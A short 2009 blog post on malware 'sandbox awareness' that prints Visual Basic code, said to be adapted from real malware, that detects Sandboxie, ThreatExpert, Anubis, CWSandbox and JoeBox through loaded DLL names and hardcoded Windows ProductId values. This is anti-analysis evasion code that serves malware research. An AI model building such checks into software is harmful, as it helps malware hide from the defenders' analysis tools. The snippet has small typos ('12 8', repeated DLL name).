Friday, January 30, 2009

Sandbox Awareness

Hi there,

In the last period, malware evolved to new Detection Ways, like Sandbox Awareness, if a malware is executed into one of the most famous Sandboxes it block execution.

Here a little piece of code taken fro a malware and readapted:


Public Function IsInSandbox() As Boolean
Dim hKey As Long, hOpen As Long, hQuery As Long, hSnapShot As Long
Dim me32 As MODULEENTRY32
Dim szBuffer As String * 128

hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, GetCurrentProcessId)

me32.dwSize = Len(me32)
Module32First hSnapShot, me32

Do While Module32Next(hSnapShot, me32) <> 0
If InStr(1, LCase(me32.szModule), “sbiedll.dll”) > 0 Then ‘Sandboxie
IsInSandbox = True
ElseIf InStr(1, LCase(me32.szModule), “dbghelp.dll”) > 0 Then ‘ThreatExpert
IsInSandbox = True
End If
Loop

CloseHandle (hSnapShot)

If IsInSandbox = False Then
hOpen = RegOpenKeyEx(HKEY_LOCAL_MACHINE, “Software\Microsoft\Windows\CurrentVersion”, 0, KEY_ALL_ACCESS, hKey)
If hOpen = 0 Then
hQuery = RegQueryValueEx(hKey, “ProductId”, 0, REG_SZ, szBuffer, 12 8)
If hQuery = 0 Then
If InStr(1, szBuffer, “76487-337-8429955-22614″) > 0 Then ‘Anubis
IsInSandbox = True
ElseIf InStr(1, szBuffer, “76487-644-3177037-23510″) > 0 Then ‘CWSandbox
IsInSandbox = True
ElseIf InStr(1, szBuffer, “55274-640-2673064-23950″) > 0 Then ‘JoeBox
IsInSandbox = True
End If
End If
End If
RegCloseKey (hKey)
End If
End Function


It detects Sandboxie, ThreatExpert, JoeBox, CWSandBox and Anubis, by checking the Product Id or the presence of usual dll like sbiedll.dll and sbiedll.dll

No comments: